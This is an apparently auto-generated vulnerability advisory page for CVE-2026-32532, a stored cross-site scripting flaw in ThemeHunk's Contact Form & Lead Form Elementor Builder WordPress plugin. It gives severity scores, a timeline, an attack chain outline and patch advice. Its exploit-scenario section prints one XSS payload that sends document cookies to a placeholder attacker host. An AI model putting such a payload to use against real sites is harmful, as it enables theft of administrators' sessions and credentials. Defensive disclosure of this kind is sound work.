Skip to main content

Contact Form Lead Form Elementor Builder CVE-2026-32532

| EUVD-2026-15903 HIGH
Cross-site Scripting (XSS) (CWE-79)
2026-03-25 Patchstack GHSA-prm5-vp6h-vqjq
XSS Contact Form Lead Form Elementor Builder
7.1
CVSS 3.1 · NVD
Share

Severity by source

NVD PRIMARY
7.1 HIGH
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
Low

Lifecycle Timeline

4
Re-analysis Queued
Apr 24, 2026 - 16:37 vuln.today
cvss_changed
EUVD ID Assigned
Mar 25, 2026 - 16:47 euvd
EUVD-2026-15903
Analysis Generated
Mar 25, 2026 - 16:47 vuln.today
CVE Published
Mar 25, 2026 - 16:15 nvd
HIGH 7.1

DescriptionCVE.org

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeHunk Contact Form & Lead Form Elementor Builder lead-form-builder allows Stored XSS.This issue affects Contact Form & Lead Form Elementor Builder: from n/a through <= 2.0.1.

AnalysisAI

A Stored Cross-Site Scripting (XSS) vulnerability exists in ThemeHunk's Contact Form & Lead Form Elementor Builder plugin for WordPress, affecting all versions through 2.0.1. An attacker can inject malicious scripts into form fields that are stored in the database and executed in the browsers of administrators or other users who view the submitted data, potentially leading to account takeover, data theft, or malware distribution. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Inject malicious JavaScript into form field
Delivery
Form submission stores XSS payload in database
Exploit
Admin views form response
Execution
Stored payload executes in admin browser
Impact
Attacker steals session cookies or credentials
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Attacker with ability to create or modify forms in ThemeHunk Contact Form & Lead Form Elementor Builder (versions ≤2.0.1) can inject malicious scripts. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment While CVSS and EPSS scores are not provided, this vulnerability carries significant real-world risk due to its nature as a Stored XSS in a widely-deployed WordPress form plugin. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker submits a contact form containing a stored XSS payload such as <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> in a form field. The plugin stores this unsanitized input in the WordPress database. …
Remediation Immediately update the Contact Form & Lead Form Elementor Builder plugin to the latest version released by ThemeHunk after 2.0.1; check the Patchstack database entry (https://patchstack.com/database/Wordpress/Plugin/lead-form-builder/vulnerability/wordpress-contact-form-lead-form-elementor-builder-plugin-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve) for the patched version number and download it from the official WordPress.org plugin repository. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 7 days: Identify all affected systems and apply vendor patches promptly. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-32532 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy